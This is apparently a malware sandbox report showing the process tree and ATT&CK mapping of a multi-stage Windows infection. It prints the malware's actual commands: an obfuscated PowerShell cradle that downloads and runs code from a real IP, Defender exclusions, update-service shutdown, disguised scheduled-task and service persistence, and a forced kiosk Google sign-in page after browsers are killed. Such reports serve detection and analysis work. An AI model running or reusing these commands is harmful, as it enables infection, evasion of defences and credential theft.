                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4280)
                    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                    - UAC bypass
                    - Blocklisted process makes network request
                    - Command and Scripting Interpreter: PowerShell
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious use of AdjustPrivilegeToken
                    - Suspicious use of WriteProcessMemory
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 5788)
                      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
                      - Command and Scripting Interpreter: PowerShell
                      - Suspicious behavior: EnumeratesProcesses
                      - Suspicious use of AdjustPrivilegeToken
                    C:\Users\Admin\AppData\Roaming\LB31.exe  (PID 6476)
                      cmdline: "C:\Users\Admin\AppData\Roaming\LB31.exe"
                      - Checks BIOS information in registry
                      - Executes dropped EXE
                      - Drops file in System32 directory
                      - Suspicious use of SetThreadContext
                      - Suspicious behavior: EnumeratesProcesses
                      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe  (PID 5912)
                        cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        - Command and Scripting Interpreter: PowerShell
                        - Suspicious behavior: EnumeratesProcesses
                        - Suspicious use of AdjustPrivilegeToken
                      C:\Windows\system32\cmd.exe  (PID 5664)
                        cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                        C:\Windows\system32\wusa.exe  (PID 6132)
                          cmdline: wusa /uninstall /kb:890830 /quiet /norestart
                      C:\Windows\system32\sc.exe  (PID 2360)
                        cmdline: C:\Windows\system32\sc.exe stop UsoSvc
                        - Launches sc.exe
                      C:\Windows\system32\sc.exe  (PID 5840)
                        cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc
                        - Launches sc.exe
                      C:\Windows\system32\sc.exe  (PID 644)
                        cmdline: C:\Windows\system32\sc.exe stop wuauserv
                        - Launches sc.exe
                        C:\Windows\System32\Conhost.exe  (PID 4372)
                          cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      C:\Windows\system32\sc.exe  (PID 2276)
                        cmdline: C:\Windows\system32\sc.exe stop bits
                        - Launches sc.exe
                      C:\Windows\system32\sc.exe  (PID 448)
                        cmdline: C:\Windows\system32\sc.exe stop dosvc
                        - Launches sc.exe
                      C:\Windows\system32\powercfg.exe  (PID 6448)
                        cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                        - Power Settings
                      C:\Windows\system32\powercfg.exe  (PID 5088)
                        cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                        - Power Settings
                      C:\Windows\system32\powercfg.exe  (PID 6136)
                        cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                        - Power Settings
                      C:\Windows\system32\powercfg.exe  (PID 4728)
                        cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                        - Power Settings
                      C:\Windows\system32\dialer.exe  (PID 5668)
                        cmdline: C:\Windows\system32\dialer.exe
                      C:\Windows\system32\sc.exe  (PID 4420)
                        cmdline: C:\Windows\system32\sc.exe delete "LIB"
                        - Launches sc.exe
                        C:\Windows\System32\Conhost.exe  (PID 5024)
                          cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      C:\Windows\system32\sc.exe  (PID 7004)
                        cmdline: C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
                        - Launches sc.exe
                      C:\Windows\system32\sc.exe  (PID 5600)
                        cmdline: C:\Windows\system32\sc.exe stop eventlog
                        - Launches sc.exe
                      C:\Windows\system32\sc.exe  (PID 2308)
                        cmdline: C:\Windows\system32\sc.exe start "LIB"
                        - Launches sc.exe
                        C:\Windows\System32\Conhost.exe  (PID 3872)
                          cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1736)
            cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
            - Blocklisted process makes network request
            - Command and Scripting Interpreter: PowerShell
            - Suspicious use of SetThreadContext
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            C:\Windows\system32\ipconfig.exe  (PID 348)
              cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns
              - Gathers network information
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  (PID 3620)
              cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              - Accesses Microsoft Outlook profiles
              - System Location Discovery: System Language Discovery
              - Suspicious use of AdjustPrivilegeToken
              - outlook_office_path
              - outlook_win_path
      C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe  (PID 948)
        cmdline: "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        C:\Users\Admin\AppData\Local\Temp\is-MODQN.tmp\FunnyJellyfish.tmp  (PID 5304)
          cmdline: "C:\Users\Admin\AppData\Local\Temp\is-MODQN.tmp\FunnyJellyfish.tmp" /SL5="$D0040,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory
          C:\Windows\SysWOW64\cmd.exe  (PID 5548)
            cmdline: "cmd.exe" /C timeout /T 3 & "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\timeout.exe  (PID 1352)
              cmdline: timeout /T 3
              - System Location Discovery: System Language Discovery
              - Delays execution with timeout.exe
            C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe  (PID 5720)
              cmdline: "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              - Suspicious use of WriteProcessMemory
              C:\Users\Admin\AppData\Local\Temp\is-QNFF2.tmp\FunnyJellyfish.tmp  (PID 1540)
                cmdline: "C:\Users\Admin\AppData\Local\Temp\is-QNFF2.tmp\FunnyJellyfish.tmp" /SL5="$A003E,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
                - Executes dropped EXE
                - System Location Discovery: System Language Discovery
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of FindShellTrayWindow
                - Suspicious use of WriteProcessMemory
                C:\Windows\SysWOW64\regsvr32.exe  (PID 1960)
                  cmdline: "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"
                  - Loads dropped DLL
                  - System Location Discovery: System Language Discovery
                  - Suspicious use of WriteProcessMemory
                  C:\Windows\system32\regsvr32.exe  (PID 6256)
                    cmdline: /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"
                    - Loads dropped DLL
                    - Suspicious behavior: EnumeratesProcesses
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 3608)
                      cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll' }) { exit 0 } else { exit 1 }"
                      - Command and Scripting Interpreter: PowerShell
                      - Suspicious behavior: EnumeratesProcesses
                      - Suspicious use of AdjustPrivilegeToken
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 7100)
                      cmdline: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{62A2717E-2A74-4715-8546-402ECE465006}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
                      - Command and Scripting Interpreter: PowerShell
                      - Suspicious behavior: EnumeratesProcesses
                      - Suspicious use of AdjustPrivilegeToken
      C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe  (PID 1828)
        cmdline: "C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe"
        - Checks computer location settings
        - Drops startup file
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 400)
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe'
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4452)
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'document.exe'
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 7032)
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\svchost.exe'
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 6148)
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
      C:\Users\Admin\AppData\Local\Temp\1008081001\a381714d22.exe  (PID 6188)
        cmdline: "C:\Users\Admin\AppData\Local\Temp\1008081001\a381714d22.exe"
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Identifies Wine through registry keys
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 208)
          cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
          - Uses browser remote debugging
          C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 4188)
            cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa093ecc40,0x7ffa093ecc4c,0x7ffa093ecc58
        C:\Users\Admin\AppData\Local\Temp\service123.exe  (PID 5780)
          cmdline: "C:\Users\Admin\AppData\Local\Temp\service123.exe"
        C:\Windows\SysWOW64\schtasks.exe  (PID 5388)
          cmdline: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
          - Scheduled Task/Job: Scheduled Task
        C:\Windows\SysWOW64\WerFault.exe  (PID 6992)
          cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 1236
          - Program crash
      C:\Users\Admin\AppData\Local\Temp\1008082001\cb913a9fce.exe  (PID 1740)
        cmdline: "C:\Users\Admin\AppData\Local\Temp\1008082001\cb913a9fce.exe"
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Identifies Wine through registry keys
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - System Location Discovery: System Language Discovery
      C:\Users\Admin\AppData\Local\Temp\1008083001\143a5c9637.exe  (PID 3520)
        cmdline: "C:\Users\Admin\AppData\Local\Temp\1008083001\143a5c9637.exe"
      C:\Users\Admin\AppData\Local\Temp\1008084001\f51356b704.exe  (PID 5600)
        cmdline: "C:\Users\Admin\AppData\Local\Temp\1008084001\f51356b704.exe"
        C:\Windows\SysWOW64\taskkill.exe  (PID 6972)
          cmdline: taskkill /F /IM firefox.exe /T
          - Kills process with taskkill
        C:\Windows\SysWOW64\taskkill.exe  (PID 6232)
          cmdline: taskkill /F /IM chrome.exe /T
          - Kills process with taskkill
        C:\Windows\SysWOW64\taskkill.exe  (PID 6596)
          cmdline: taskkill /F /IM msedge.exe /T
          - Kills process with taskkill
        C:\Windows\SysWOW64\taskkill.exe  (PID 6916)
          cmdline: taskkill /F /IM opera.exe /T
          - Kills process with taskkill
        C:\Windows\SysWOW64\taskkill.exe  (PID 6088)
          cmdline: taskkill /F /IM brave.exe /T
          - Kills process with taskkill
        C:\Program Files\Mozilla Firefox\firefox.exe  (PID 4184)
          cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          C:\Program Files\Mozilla Firefox\firefox.exe  (PID 5304)
            cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
            C:\Program Files\Mozilla Firefox\firefox.exe  (PID 5312)
              cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1896 -prefMapHandle 1884 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {79f3bde0-819f-4043-9e14-2720b301bd2c} 5304 "\\.\pipe\gecko-crash-server-pipe.5304" gpu
            C:\Program Files\Mozilla Firefox\firefox.exe  (PID 2368)
              cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2472 -parentBuildID 20240401114208 -prefsHandle 2392 -prefMapHandle 2388 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {02d70f6b-0976-4dca-8f94-5163f9c5d7b4} 5304 "\\.\pipe\gecko-crash-server-pipe.5304" socket
            C:\Program Files\Mozilla Firefox\firefox.exe  (PID 5504)
              cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3268 -childID 1 -isForBrowser -prefsHandle 3260 -prefMapHandle 3256 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 900 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e2bd484-59ee-4d1c-9b05-695ccb01fc57} 5304 "\\.\pipe\gecko-crash-server-pipe.5304" tab
            C:\Program Files\Mozilla Firefox\firefox.exe  (PID 6988)
              cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3236 -childID 2 -isForBrowser -prefsHandle 3248 -prefMapHandle 3092 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 900 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8323b942-1738-4267-9670-bc3d75ed8d81} 5304 "\\.\pipe\gecko-crash-server-pipe.5304" tab
            C:\Program Files\Mozilla Firefox\firefox.exe  (PID 3172)
              cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4928 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4752 -prefMapHandle 4748 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa0f628b-26bc-4e05-860f-dfff83e9521d} 5304 "\\.\pipe\gecko-crash-server-pipe.5304" utility
            C:\Program Files\Mozilla Firefox\firefox.exe  (PID 4988)
              cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5292 -childID 3 -isForBrowser -prefsHandle 5272 -prefMapHandle 5252 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 900 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b978d038-023b-4dd2-ba3b-441f743d84b1} 5304 "\\.\pipe\gecko-crash-server-pipe.5304" tab
            C:\Program Files\Mozilla Firefox\firefox.exe  (PID 3680)
              cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5432 -childID 4 -isForBrowser -prefsHandle 5508 -prefMapHandle 5504 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 900 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2478ad12-9cbf-47f3-9102-be2fd323d483} 5304 "\\.\pipe\gecko-crash-server-pipe.5304" tab
            C:\Program Files\Mozilla Firefox\firefox.exe  (PID 6720)
              cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5412 -childID 5 -isForBrowser -prefsHandle 5648 -prefMapHandle 5652 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 900 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3776eef9-fd09-46eb-82c6-95dc60bee77a} 5304 "\\.\pipe\gecko-crash-server-pipe.5304" tab
            C:\Program Files\Mozilla Firefox\firefox.exe  (PID 6976)
              cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5744 -childID 6 -isForBrowser -prefsHandle 5768 -prefMapHandle 5780 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 900 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6acdf8ee-8f92-41cb-9b3f-68f2747c8916} 5304 "\\.\pipe\gecko-crash-server-pipe.5304" tab
            C:\Program Files\Mozilla Firefox\minidump-analyzer.exe  (PID 7076)
              cmdline: "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\pending\b2a54b18-956b-4ff5-b05b-76fd50fc82b0.dmp"
            C:\Program Files\Mozilla Firefox\minidump-analyzer.exe  (PID 2680)
              cmdline: "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\pending\e098f18d-d929-465e-8913-8269e03af730.dmp"
            C:\Program Files\Mozilla Firefox\firefox.exe  (PID 688)
              cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5448 -childID 7 -isForBrowser -prefsHandle 5460 -prefMapHandle 5744 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 900 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {18507259-984f-493e-b03e-15ff8034ad68} 5304 "\\.\pipe\gecko-crash-server-pipe.5304" tab
            C:\Program Files\Mozilla Firefox\firefox.exe  (PID 4684)
              cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5780 -childID 8 -isForBrowser -prefsHandle 5320 -prefMapHandle 5472 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 900 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e1cb529-023e-424e-9653-bd5e74ccb5ad} 5304 "\\.\pipe\gecko-crash-server-pipe.5304" tab
            C:\Program Files\Mozilla Firefox\minidump-analyzer.exe  (PID 6924)
              cmdline: "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\pending\4eb374cb-b032-4bdd-8aa7-9a6570f2fd1f.dmp"
      C:\Users\Admin\AppData\Local\Temp\1008085001\6a001535fa.exe  (PID 3696)
        cmdline: "C:\Users\Admin\AppData\Local\Temp\1008085001\6a001535fa.exe"
C:\Windows\system32\svchost.exe  (PID 3568)
  cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe  (PID 3760)
  cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe  (PID 3908)
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe  (PID 4176)
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe  (PID 4840)
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\svchost.exe  (PID 1108)
  cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe  (PID 3576)
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe  (PID 2220)
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe  (PID 3604)
  cmdline: C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe  (PID 3880)
  cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe  (PID 3648)
  cmdline: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\svchost.exe  (PID 4408)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\DllHost.exe  (PID 3940)
  cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe  (PID 864)
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\system32\svchost.exe  (PID 3564)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
  - Drops file in Windows directory
C:\Windows\system32\wbem\wmiprvse.exe  (PID 4748)
  cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  - Checks BIOS information in registry
  - Checks processor information in registry
  - Enumerates system info in registry
C:\Windows\servicing\TrustedInstaller.exe  (PID 4108)
  cmdline: C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\svchost.exe  (PID 5080)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe  (PID 3212)
  cmdline: C:\Windows\System32\mousocoreworker.exe -Embedding
C:\ProgramData\Mig\Mig.exe  (PID 5932)
  cmdline: C:\ProgramData\Mig\Mig.exe
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe  (PID 4244)
    cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    C:\Windows\System32\Conhost.exe  (PID 5828)
      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  C:\Windows\system32\cmd.exe  (PID 3176)
    cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    C:\Windows\System32\Conhost.exe  (PID 6072)
      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\system32\wusa.exe  (PID 4872)
      cmdline: wusa /uninstall /kb:890830 /quiet /norestart
  C:\Windows\system32\sc.exe  (PID 1948)
    cmdline: C:\Windows\system32\sc.exe stop UsoSvc
    - Launches sc.exe
    C:\Windows\System32\Conhost.exe  (PID 4296)
      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  C:\Windows\system32\sc.exe  (PID 5800)
    cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc
    - Launches sc.exe
  C:\Windows\system32\sc.exe  (PID 3856)
    cmdline: C:\Windows\system32\sc.exe stop wuauserv
    - Launches sc.exe
    C:\Windows\System32\Conhost.exe  (PID 5376)
      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  C:\Windows\system32\sc.exe  (PID 5904)
    cmdline: C:\Windows\system32\sc.exe stop bits
    - Launches sc.exe
  C:\Windows\system32\sc.exe
    cmdline: C:\Windows\system32\sc.exe stop dosvc
- Launches sc.exe
PID:7160
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:2904 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5964
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:3844 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4532
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:5364 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3420
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:4068 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2532
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:5316
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:6272
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵PID:5420
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 460 -p 6924 -ip 69241⤵PID:2308
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 6188 -ip 61881⤵PID:5588
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (3)
  - JavaScript (1)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
- System Services (2)
  - Service Execution (2)
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2)
  - Windows Service (2)
- Modify Authentication Process (1)
- Power Settings (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2)
  - Windows Service (2)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (2)
  - Disable or Modify Tools (1)
- Modify Authentication Process (1)
- Modify Registry (2)
- Virtualization/Sandbox Evasion (2)
Downloads